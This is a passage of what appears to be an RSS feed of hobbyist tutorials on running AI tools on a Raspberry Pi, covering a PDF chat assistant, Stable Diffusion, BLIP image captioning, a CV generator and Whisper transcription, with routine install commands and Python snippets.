&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Create and activate a virtual environment:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;python3 -m venv pdfbot-env
source pdfbot-env/bin/activate
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Now install the core Python libraries:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;pip install --upgrade pip
pip install langchain faiss-cpu pypdf openai tiktoken
&lt;/code&gt;&lt;/pre&gt;&lt;blockquote&gt;&lt;p&gt;Optionally:&lt;br&gt;Replace &lt;code&gt;openai&lt;/code&gt; with &lt;code&gt;llama-cpp-python&lt;/code&gt; or &lt;code&gt;transformers&lt;/code&gt; if you want to use local models instead of OpenAI’s API.&lt;/p&gt;&lt;/blockquote&gt;&lt;hr&gt;&lt;h2&gt; Step 2: Load and Split Your PDF&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-python"&gt;from langchain.document_loaders import PyPDFLoader
from langchain.text_splitter import CharacterTextSplitter

loader = PyPDFLoader("your_file.pdf")
pages = loader.load()

text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=200)
documents = text_splitter.split_documents(pages)
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Step 3: Embed and Store Text&lt;/h2&gt;&lt;p&gt;Use FAISS to store searchable vectors:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-python"&gt;from langchain.vectorstores import FAISS
from langchain.embeddings.openai import OpenAIEmbeddings

embedding = OpenAIEmbeddings()
db = FAISS.from_documents(documents, embedding)
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Step 4: Set Up the Chat Function&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-python"&gt;from langchain.chains.question_answering import load_qa_chain
from langchain.llms import OpenAI

chain = load_qa_chain(OpenAI(), chain_type="stuff")

def ask(query):
    docs = db.similarity_search(query)
    answer = chain.run(input_documents=docs, question=query)
    return answer
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Example usage:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-python"&gt;print(ask("What does the report say about revenue growth in 2023?"))
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;️ Optional: Use a Local Model Instead of OpenAI&lt;/h2&gt;&lt;p&gt;Replace &lt;code&gt;OpenAI()&lt;/code&gt; with a local LLM like &lt;code&gt;llama.cpp&lt;/code&gt;, or use an API like Ollama running on your Pi. Just swap out the &lt;code&gt;LLM&lt;/code&gt; in &lt;code&gt;load_qa_chain&lt;/code&gt;.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt; Final Notes&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 5 handles vector search + API queries easily.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;RAM-intensive operations like LLM inference locally may require &lt;strong&gt;swap files&lt;/strong&gt; or &lt;strong&gt;8GB model variants&lt;/strong&gt;.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;For full local use, combine with &lt;code&gt;llama.cpp&lt;/code&gt; and a local embedding model.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt; Summary&lt;/h2&gt;&lt;p&gt;You’ve now built a Chat-with-PDF Assistant that runs on your Raspberry Pi and can answer questions about any document you upload. It's private, fast, and extendable.&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/98/turn-your-raspberry-pi-into-a-chat-with-pdf-ai-assistant</guid>
<pubDate>Tue, 22 Jul 2025 06:47:24 +0000</pubDate>
</item>
<item>
<title>Run a Stable Diffusion Image Generator Locally on Raspberry Pi 5</title>
<link>https://asky.uk/97/run-stable-diffusion-image-generator-locally-on-raspberry</link>
<description>&lt;h2&gt;&lt;strong&gt;Run a Stable Diffusion Image Generator Locally on Raspberry Pi 5&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;&lt;img alt="" src="https://miro.medium.com/v2/resize:fit:1200/1*Rbq9cDCJpGq7HKeNAeIitg.jpeg" style="height:506px; width:900px"&gt;&lt;/p&gt;&lt;p&gt;&lt;em&gt;Create stunning AI-generated images on your Pi — without internet!&lt;/em&gt;&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;️ Overview&lt;/h3&gt;&lt;p&gt;Stable Diffusion is a powerful open-source image generation model that turns &lt;strong&gt;text prompts&lt;/strong&gt; into &lt;strong&gt;photorealistic or artistic images&lt;/strong&gt;. While it's typically run on desktops with powerful GPUs, recent optimizations and the Raspberry Pi 5's performance improvements make it possible (with compromises) to run &lt;strong&gt;lightweight versions&lt;/strong&gt; of it &lt;strong&gt;locally&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;In this article, we’ll show you how to:&lt;/p&gt;&lt;p&gt;✅ Run a CPU-friendly version of Stable Diffusion on Raspberry Pi 5&lt;br&gt;✅ Generate images from text prompts&lt;br&gt;✅ Use Python and diffusers library from HuggingFace&lt;br&gt;✅ Work fully offline after setup&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;⚠️ &lt;em&gt;This guide uses a highly optimized model suited for CPU-only inference. Don’t expect real-time speed — but it works!&lt;/em&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;hr&gt;&lt;h3&gt;Requirements&lt;/h3&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Component&lt;/th&gt;&lt;th&gt;Version / Notes&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Raspberry Pi&lt;/td&gt;&lt;td&gt;Pi 5 (8GB RAM strongly recommended)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;OS&lt;/td&gt;&lt;td&gt;Raspberry Pi OS Bookworm (64-bit)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Python&lt;/td&gt;&lt;td&gt;≥ 3.10&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Disk Space&lt;/td&gt;&lt;td&gt;~6 GB&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Internet&lt;/td&gt;&lt;td&gt;Only for installation and model download&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Model&lt;/td&gt;&lt;td&gt;Stable Diffusion 1.5 (CPU-optimized)&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;hr&gt;&lt;h3&gt;Step 1: System Setup&lt;/h3&gt;&lt;pre&gt;sudo apt update &amp;amp;&amp;amp; sudo apt upgrade -y
sudo apt install python3 python3-venv python3-pip -y
&lt;/pre&gt;&lt;p&gt;Create and activate a Python virtual environment:&lt;/p&gt;&lt;pre&gt;python3 -m venv sd-env
source sd-env/bin/activate
&lt;/pre&gt;&lt;hr&gt;&lt;h3&gt;Step 2: Install Required Python Libraries&lt;/h3&gt;&lt;pre&gt;pip install --upgrade pip
pip install torch torchvision torchaudio --index-url https://download.pytorch.org/whl/cpu
pip install diffusers transformers accelerate scipy safetensors
&lt;/pre&gt;&lt;p&gt;We use the &lt;strong&gt;CPU-only version of PyTorch&lt;/strong&gt; to ensure compatibility with the Raspberry Pi’s hardware.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Step 3: Download a CPU-optimized Model&lt;/h3&gt;&lt;p&gt;Let’s use the runwayml/stable-diffusion-v1-5 or smaller variant from HuggingFace.&lt;/p&gt;&lt;p&gt;You can use this script to automatically load and save the model locally:&lt;/p&gt;&lt;pre&gt;from diffusers import StableDiffusionPipeline
import torch

pipeline = StableDiffusionPipeline.from_pretrained(
    "runwayml/stable-diffusion-v1-5",
    torch_dtype=torch.float32,
)
pipeline = pipeline.to("cpu")

prompt = "A cyberpunk robot cat, neon background"
image = pipeline(prompt).images[0]
image.save("output.png")
&lt;/pre&gt;&lt;hr&gt;&lt;h3&gt;Tip: Use Smaller Models&lt;/h3&gt;&lt;p&gt;If your Pi struggles, try:&lt;/p&gt;&lt;pre&gt;from diffusers import DiffusionPipeline
pipe = DiffusionPipeline.from_pretrained("stabilityai/stable-diffusion-2-1-base")
&lt;/pre&gt;&lt;p&gt;Or explore CPU-optimized models like:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;CompVis/stable-diffusion-v1-4&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Linaqruf/stable-diffusion-1-5-better-vae&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;SG161222/Realistic_Vision_V5.1_noVAE&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h3&gt;How Long Does It Take?&lt;/h3&gt;&lt;p&gt;On Raspberry Pi 5 (8GB):&lt;/p&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Image Size&lt;/th&gt;&lt;th&gt;Inference Time&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;256x256&lt;/td&gt;&lt;td&gt;~2-4 minutes&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;512x512&lt;/td&gt;&lt;td&gt;~7-12 minutes&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;⚠️ Do &lt;strong&gt;not&lt;/strong&gt; expect desktop GPU speeds — but for low-volume, offline creative projects, it's functional.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Optional: Serve as a Web App with Gradio&lt;/h3&gt;&lt;pre&gt;pip install gradio
&lt;/pre&gt;&lt;p&gt;Add this to the script:&lt;/p&gt;&lt;pre&gt;import gradio as gr

def generate(prompt):
    image = pipeline(prompt).images[0]
    return image

gr.Interface(fn=generate, inputs="text", outputs="image").launch()
&lt;/pre&gt;&lt;p&gt;Access locally via http://localhost:7860&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Example Output&lt;/h3&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Prompt&lt;/th&gt;&lt;th&gt;Result&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;em&gt;“A medieval knight riding a dragon through the clouds”&lt;/em&gt;&lt;/td&gt;&lt;td&gt;️ &lt;img alt="Example" src="#"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;em&gt;“A serene lake in the forest during sunset, ultra-realistic”&lt;/em&gt;&lt;/td&gt;&lt;td&gt;️ &lt;img alt="Example" src="#"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;em&gt;(You can host real examples or dummy images later on your blog)&lt;/em&gt;&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Summary&lt;/h3&gt;&lt;p&gt;You’ve now turned your Raspberry Pi 5 into a &lt;strong&gt;local AI image generator&lt;/strong&gt; using Stable Diffusion. While it’s not lightning-fast, it’s fully offline, works with open-source tools, and gives you creative freedom at the edge.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/97/run-stable-diffusion-image-generator-locally-on-raspberry</guid>
<pubDate>Sun, 20 Jul 2025 18:58:24 +0000</pubDate>
</item>
<item>
<title>Image Caption Generator using BLIP + PiCamera on Raspberry Pi</title>
<link>https://asky.uk/96/image-caption-generator-using-blip-picamera-on-raspberry-pi</link>
<description>&lt;h1&gt;️ Image Caption Generator using BLIP + PiCamera on Raspberry Pi&lt;/h1&gt;&lt;div&gt;&lt;img alt="" src="https://miro.medium.com/v2/resize:fit:1400/0*WeUeBnvELPwBQ7ff" style="height:238px; width:900px"&gt;&lt;/div&gt;&lt;p&gt;Turn your Raspberry Pi into a smart image captioning device using BLIP, an AI model that generates natural language descriptions of images.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt; Overview&lt;/h2&gt;&lt;p&gt;In this project, you will:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Capture images using the PiCamera&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use the BLIP (Bootstrapped Language Image Pretraining) model to generate captions&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Display or store the generated captions&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Optionally build a simple web interface with Gradio&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This project works best with Raspberry Pi 4 or 5 and requires an internet connection (for downloading models or using APIs).&lt;/p&gt;&lt;hr&gt;&lt;h2&gt; Requirements&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 4 or 5 (Pi 3 will struggle with BLIP model inference)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi OS 64-bit (updated)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;PiCamera or USB camera&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Python 3.9+&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;pip and virtualenv&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Git&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt; Step 1: Install System Dependencies&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;sudo apt update &amp;amp;&amp;amp; sudo apt upgrade -y
sudo apt install python3-pip python3-venv libjpeg-dev libopenjp2-7-dev
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Step 2: Set Up Python Environment&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;mkdir ~/blip-caption
cd ~/blip-caption
python3 -m venv venv
source venv/bin/activate
pip install torch torchvision
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Step 3: Install HuggingFace Transformers and BLIP&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;pip install transformers timm pillow
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Step 4: Capture Image with PiCamera&lt;/h2&gt;&lt;p&gt;If you're using the legacy PiCamera:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;pip install picamera
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;And use this code to capture an image:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-python"&gt;from picamera import PiCamera
from time import sleep

camera = PiCamera()
camera.start_preview()
sleep(2)
camera.capture('image.jpg')
camera.stop_preview()
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;For USB camera, use OpenCV:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;pip install opencv-python
&lt;/code&gt;&lt;/pre&gt;&lt;pre&gt;&lt;code class="language-python"&gt;import cv2
cap = cv2.VideoCapture(0)
ret, frame = cap.read()
cv2.imwrite('image.jpg', frame)
cap.release()
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Step 5: Generate Caption Using BLIP&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-python"&gt;from transformers import BlipProcessor, BlipForConditionalGeneration
from PIL import Image
import torch

processor = BlipProcessor.from_pretrained("Salesforce/blip-image-captioning-base")
model = BlipForConditionalGeneration.from_pretrained("Salesforce/blip-image-captioning-base")

raw_image = Image.open("image.jpg").convert('RGB')
inputs = processor(raw_image, return_tensors="pt")
out = model.generate(**inputs)
caption = processor.decode(out[0], skip_special_tokens=True)
print("Caption:", caption)
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Optional: Add Gradio Interface&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;pip install gradio
&lt;/code&gt;&lt;/pre&gt;&lt;pre&gt;&lt;code class="language-python"&gt;import gradio as gr

def caption_image(image):
    inputs = processor(image, return_tensors="pt")
    out = model.generate(**inputs)
    return processor.decode(out[0], skip_special_tokens=True)

gr.Interface(fn=caption_image, inputs="image", outputs="text").launch()
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;✅ Conclusion&lt;/h2&gt;&lt;p&gt;You've built a working image caption generator using Raspberry Pi, PiCamera, and the BLIP AI model. You can now:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Add automatic uploads or email integration&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Extend it into a surveillance or accessibility tool&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use it in photo archiving projects&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/96/image-caption-generator-using-blip-picamera-on-raspberry-pi</guid>
<pubDate>Sun, 20 Jul 2025 11:21:30 +0000</pubDate>
</item>
<item>
<title>Build an AI Resume / CV Generator on Raspberry Pi</title>
<link>https://asky.uk/94/build-an-ai-resume-cv-generator-on-raspberry-pi</link>
<description>&lt;p&gt;One of the most requested AI tools today is an automatic CV or Resume Generator powered by language models. In this guide, we'll show you how to build one on a Raspberry Pi 4 using Python and Open Source models. This lightweight solution doesn't require paid API keys, and it can be deployed as a local or web-based app.&lt;/p&gt;&lt;h2&gt;Requirements&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 4 (4GB or 8GB RAM recommended)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi OS (Bookworm or Bullseye)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Python 3.9+&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;pip (Python package manager)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Basic knowledge of Python and command line&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;(Optional) Flask or Gradio for Web Interface&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h2&gt;Step 1: Update and Prepare Your Pi&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;sudo apt update &amp;amp;&amp;amp; sudo apt upgrade -y
sudo apt install python3-pip git
&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Step 2: Create Project Directory&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;mkdir ~/cv_generator &amp;amp;&amp;amp; cd ~/cv_generator
python3 -m venv venv
source venv/bin/activate
&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Step 3: Install Required Libraries&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;pip install transformers gradio torch
&lt;/code&gt;&lt;/pre&gt;&lt;blockquote&gt;&lt;p&gt;On Raspberry Pi 4, Torch may take a while to install. Use &lt;code&gt;pip install torch==1.13.1&lt;/code&gt; if you face version issues.&lt;/p&gt;&lt;/blockquote&gt;&lt;h2&gt;Step 4: Choose a Small Language Model&lt;/h2&gt;&lt;p&gt;We'll use the lightweight &lt;a rel="nofollow" href="https://huggingface.co/distilgpt2"&gt;distilGPT2&lt;/a&gt; to generate CV content.&lt;/p&gt;&lt;pre&gt;&lt;code class="language-python"&gt;from transformers import pipeline

generator = pipeline("text-generation", model="distilgpt2")

def generate_cv(name, job_title):
    prompt = f"Create a professional resume for {name}, applying for a {job_title} position."
    result = generator(prompt, max_length=300, num_return_sequences=1)
    return result[0]['generated_text']
&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Step 5: Add Gradio Interface&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-python"&gt;import gradio as gr

def run_cv_gen(name, job):
    return generate_cv(name, job)

gr.Interface(fn=run_cv_gen,
             inputs=["text", "text"],
             outputs="text",
             title="AI CV Generator on Pi",
             description="Enter your name and job title to generate a sample CV.").launch()
&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Step 6: Run the App&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;python3 app.py
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Open your browser at &lt;code&gt;http://localhost:7860&lt;/code&gt;&lt;/p&gt;&lt;h2&gt;Step 7: Optional - Make It Public&lt;/h2&gt;&lt;p&gt;Use &lt;a rel="nofollow" href="https://ngrok.com"&gt;ngrok&lt;/a&gt; or &lt;a rel="nofollow" href="https://www.npmjs.com/package/localtunnel"&gt;localtunnel&lt;/a&gt; to share your local Pi app with the world.&lt;/p&gt;&lt;p&gt;Example with localtunnel:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;npx localtunnel --port 7860
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;Final Tips&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;You can replace &lt;code&gt;distilgpt2&lt;/code&gt; with any other small language model for more detailed results.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add a "Download as PDF" button using &lt;code&gt;pdfkit&lt;/code&gt; or &lt;code&gt;reportlab&lt;/code&gt; for resume export.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Consider adding language selection for multi-lingual CVs.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h2&gt;Future Enhancements&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Add support for uploading an existing resume and improving it&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Integrate with job boards or LinkedIn scraping&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add image/logo or AI-generated portrait with Stable Diffusion&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;p&gt;&lt;img alt="" src="https://careercompanion.cv-creator.com/theme/Cakestrap/img/logo.jpg" style="height:158px; width:297px"&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/94/build-an-ai-resume-cv-generator-on-raspberry-pi</guid>
<pubDate>Sat, 19 Jul 2025 19:59:30 +0000</pubDate>
</item>
<item>
<title>Run Whisper Speech-to-Text on Raspberry Pi 5</title>
<link>https://asky.uk/93/run-whisper-speech-to-text-on-raspberry-pi-5</link>
<description>&lt;h1&gt;How to Run Whisper AI Speech-to-Text on Raspberry Pi 5 (Offline)&lt;/h1&gt;&lt;p&gt;&lt;strong&gt;Contents:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;✅ What is Whisper?&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅ How it works on Raspberry Pi 5&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅ Step-by-step installation&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅ Record your voice&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅ Transcribe with Whisper&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅ Optimization tips&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;✅ Test result&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;What is Whisper?&lt;/h2&gt;&lt;p&gt;Whisper is a powerful &lt;strong&gt;AI model for converting speech to text&lt;/strong&gt;, created by OpenAI. It supports over 90 languages and can work &lt;strong&gt;entirely offline&lt;/strong&gt; thanks to &lt;a rel="nofollow" href="https://github.com/ggerganov/whisper.cpp"&gt;whisper.cpp&lt;/a&gt; – a C/C++ port of the original model optimized for low-resource devices like Raspberry Pi.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://nolongerset.com/content/images/2025/04/ultra_realistic_im_image.jpg" style="height:547px; width:980px"&gt;&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;Requirements&lt;/h2&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Component&lt;/th&gt;&lt;th&gt;Recommended&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Raspberry Pi 5&lt;/td&gt;&lt;td&gt;4GB or 8GB RAM ✅&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Microphone&lt;/td&gt;&lt;td&gt;USB or 3.5mm Jack&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;OS&lt;/td&gt;&lt;td&gt;Raspberry Pi OS 64-bit&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Internet&lt;/td&gt;&lt;td&gt;Only during installation&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;hr&gt;&lt;h2&gt;Step 1: Install Dependencies&lt;/h2&gt;&lt;pre&gt;sudo apt update
sudo apt install git build-essential cmake python3-pip portaudio19-dev ffmpeg -y
&lt;/pre&gt;&lt;p&gt;Clone and build whisper.cpp:&lt;/p&gt;&lt;pre&gt;git clone https://github.com/ggerganov/whisper.cpp
cd whisper.cpp
make
&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;Step 2: Download the tiny.en model (~75MB)&lt;/h2&gt;&lt;pre&gt;./models/download-ggml-model.sh tiny.en
&lt;/pre&gt;&lt;blockquote&gt;&lt;p&gt;This is the &lt;strong&gt;fastest&lt;/strong&gt; and most suitable model for Raspberry Pi 5.&lt;/p&gt;&lt;/blockquote&gt;&lt;hr&gt;&lt;h2&gt;️ Step 3: Record 10 seconds of audio&lt;/h2&gt;&lt;p&gt;Use arecord:&lt;/p&gt;&lt;pre&gt;arecord -D plughw:1,0 -f cd -t wav -d 10 -r 16000 test.wav
&lt;/pre&gt;&lt;p&gt;To find your device name:&lt;/p&gt;&lt;pre&gt;arecord -l
&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;Step 4: Transcribe the audio with Whisper&lt;/h2&gt;&lt;pre&gt;./main -m models/ggml-tiny.en.bin -f test.wav -otxt
&lt;/pre&gt;&lt;p&gt;This will produce test.wav.txt containing the recognized speech.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;Tips for Better Performance&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Always use &lt;strong&gt;tiny.en&lt;/strong&gt; model for speed&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Disable GUI / run in CLI mode (raspi-config → Boot to CLI)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use class 10 U3 microSD or USB SSD for better I/O&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;Example Result&lt;/h2&gt;&lt;pre&gt;[00:00:00.000 --&amp;gt; 00:00:05.000] Hello, this is a test of the Whisper AI on Raspberry Pi 5.
&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;Support the Project&lt;/h2&gt;&lt;pre&gt;&amp;lt;a href="https://ko-fi.com/askyai" target="_blank"&amp;gt;
  ☕ Support this tutorial on Ko-fi
&amp;lt;/a&amp;gt;
&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;Share This Guide&lt;/h2&gt;&lt;h2&gt;✅ You're Ready!&lt;/h2&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/93/run-whisper-speech-to-text-on-raspberry-pi-5</guid>
<pubDate>Sat, 19 Jul 2025 14:54:30 +0000</pubDate>
</item>
<item>
<title>How to build a Mini FPV Piaggio P.180 Avanti Replica with ESP32</title>
<link>https://asky.uk/92/how-to-build-a-mini-fpv-piaggio-180-avanti-replica-with-esp32</link>
<description>&lt;p&gt;This guide will walk you through the step-by-step process of building a compact, lightweight FPV-capable replica of the Piaggio P.180 Avanti aircraft. The build focuses on using inexpensive components like foam (e.g., styrofoam or depron), brushed motors, an ESP32-CAM module for FPV, and basic control via coil actuators or dual-motor thrust vectoring. The aim is to create a functional, minimalist FPV plane using microcontrollers and camera modules that can be controlled via a smartphone.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://i.ibb.co/jkzDQtCM/foam-fun.png" style="height:866px; width:866px"&gt;&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;Table of Contents&lt;/h2&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Introduction&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Materials and Components&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Airframe Design and Construction&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Electronics Integration&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Motor and Actuator Setup&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;FPV System Configuration&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Power Supply and Battery Mounting&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Weight Optimization&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Testing and Calibration&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Flying and 